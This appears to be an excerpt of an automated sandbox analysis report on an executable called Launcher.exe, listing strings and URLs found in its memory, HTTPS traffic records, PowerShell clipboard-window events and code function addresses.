        Source: Launcher.exe, 00000000.00000003.1383675036.0000002D2C9C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1380649401.000000017A6C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://registry.npmjs.org/)
        Source: Launcher.exe, 00000000.00000003.1487127017.000002D655780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://registry.npmjs.org/9
        Source: Launcher.exe, 00000000.00000003.1273115219.0000017526217000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1257176949.0000017526217000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ruben.verborgh.org/)
        Source: Launcher.exe, 00000000.00000003.1238316997.00000175261AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://searchbeam.jit.su)
        Source: Launcher.exe, 00000000.00000003.1258032982.000001752630E000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1247222794.0000030CA43C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1252239907.00000175260C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://server.net/
        Source: Launcher.exe, 00000000.00000003.1383139729.00000105F8501000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1314370569.00000175265D4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sheetjs.com/
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://sourcemaps.info/spec.html
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sqlite.org/)
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://stackoverflow.com/a/5501711/3561
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-%typedarray%-intrinsic-object
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slot
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-%iteratorprototype%-object
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-%typedarray%.of
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-object.prototype.tostring
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2397#section-2
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3492#section-3.4
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3986#section-3.2.2
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc6455#section-1.3
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.2
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.6
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7540#section-8.1.2.5
        Source: Launcher.exe, 00000000.00000003.1545921007.000001752609F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1545921007.0000017526099000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1539875535.0000017526094000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc8032
        Source: Launcher.exe, 00000000.00000003.1539875535.0000017526094000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc8410#section-10.3
        Source: Launcher.exe, 00000000.00000003.1376078593.00000238E3701000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://travis-ci.org/lodash/lodash-cli
        Source: Launcher.exe, 00000000.00000003.1275681448.00000175261D1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1261532478.00000175261D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/BlaineBublitz)
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#cannot-have-a-username-password-port
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-url
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-url-origin
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-byte-serializer
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-parser
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-serializer
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#forbidden-host-code-point
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#special-scheme
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#url
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#url-serializing
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams-stringification-behavior
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://v8.dev/blog/v8-release-89
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://w3c.github.io/resource-timing/#dfn-mark-resource-timing
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://w3c.github.io/resource-timing/#dfn-setup-the-resource-timing-entry
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://w3c.github.io/webappsec-subresource-integrity/#the-integrity-attribute
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://webassembly.github.io/spec/web-api
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://wiki.squid-cache.org/SquidFaq/InnerWorkings#What_is_a_half-closed_filedescriptor.3F
        Source: Launcher.exe, 00000000.00000003.1284664317.0000017526287000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1284664317.000001752628B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1365774806.0000020D192C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.archiverjs.com/zip-stream/ZipStream.html
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-line-terminators
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-promise.all
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-timeclip
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/5.1/#sec-15.1.3.4
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Alternative
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Atom
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-CharacterClass
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-CharacterClassEscape
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtom
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtomNoDash
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassRanges
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ControlEscape
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ControlLetter
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-DecimalDigits
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-DecimalEscape
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Disjunction
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Hex4Digits
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexDigit
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexDigits
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexEscapeSequence
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRanges
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRangesNoDash
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-OctalDigit
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Pattern
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-PatternCharacter
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Quantifier
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-QuantifierPrefix
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-RegExpUnicodeEscapeSequence
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-SyntaxCharacter
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-Assertion
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-AtomEscape
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-CharacterEscape
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ClassControlLetter
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ClassEscape
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ExtendedAtom
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ExtendedPatternCharacter
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-IdentityEscape
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-InvalidBracedQuantifier
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-LegacyOctalEscapeSequence
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-Term
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#sec-atomescape
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#sec-term
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.iana.org/assignments/tls-extensiontype-values
        Source: Launcher.exe, 00000000.00000003.1515621239.00000175261E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2011/february/double-hmac-verificati
        Source: Launcher.exe, 00000000.00000003.1231112083.000001752607D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1231112083.00000175260CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.npmjs.com/package/form-data
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.npmjs.com/package/sqlite3)
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sqlite.org/json1.html)
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.unicode.org/Public/UNIDATA/EastAsianWidth.txt
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 24%
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFC9FC3F03F22_2_00007FFC9FC3F03F
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFC9FC3134822_2_00007FFC9FC31348
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFC9FC469D422_2_00007FFC9FC469D4
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFC9FC4718822_2_00007FFC9FC47188
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFC9FC4699E22_2_00007FFC9FC4699E
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFC9FC7C8E022_2_00007FFC9FC7C8E0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFC9FC3F08722_2_00007FFC9FC3F087
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFC9FEA9C2022_2_00007FFC9FEA9C20
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFC9FEFFB4022_2_00007FFC9FEFFB40
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA011E63922_2_00007FFCA011E639
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA011B49D22_2_00007FFCA011B49D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA0112CB622_2_00007FFCA0112CB6
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA011B07D22_2_00007FFCA011B07D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA011648B22_2_00007FFCA011648B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA011789422_2_00007FFCA0117894
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA01068CD22_2_00007FFCA01068CD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA01100CD22_2_00007FFCA01100CD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA01144CD22_2_00007FFCA01144CD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA011152D22_2_00007FFCA011152D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA011610B22_2_00007FFCA011610B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA011910D22_2_00007FFCA011910D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA010D15D22_2_00007FFCA010D15D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA010F96D22_2_00007FFCA010F96D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA011A94B22_2_00007FFCA011A94B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA011714B22_2_00007FFCA011714B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA01159AD22_2_00007FFCA01159AD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA010558122_2_00007FFCA0105581
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA01041BA22_2_00007FFCA01041BA
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA011B9E522_2_00007FFCA011B9E5
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA011A1E822_2_00007FFCA011A1E8
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA011C1BD22_2_00007FFCA011C1BD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA010BDBD22_2_00007FFCA010BDBD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA011622422_2_00007FFCA0116224
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA0102A1022_2_00007FFCA0102A10
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA0116E2B22_2_00007FFCA0116E2B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA011C62D22_2_00007FFCA011C62D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA010B22D22_2_00007FFCA010B22D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA0115E2D22_2_00007FFCA0115E2D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA010E26D22_2_00007FFCA010E26D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA011BE9D22_2_00007FFCA011BE9D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA011A6AD22_2_00007FFCA011A6AD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA0119E7D22_2_00007FFCA0119E7D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA011B6ED22_2_00007FFCA011B6ED
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA0117AED22_2_00007FFCA0117AED
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA0119B1D22_2_00007FFCA0119B1D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA010EF1D22_2_00007FFCA010EF1D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA010AB2D22_2_00007FFCA010AB2D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA0110B2D22_2_00007FFCA0110B2D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA0116F0E22_2_00007FFCA0116F0E
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA010072822_2_00007FFCA0100728
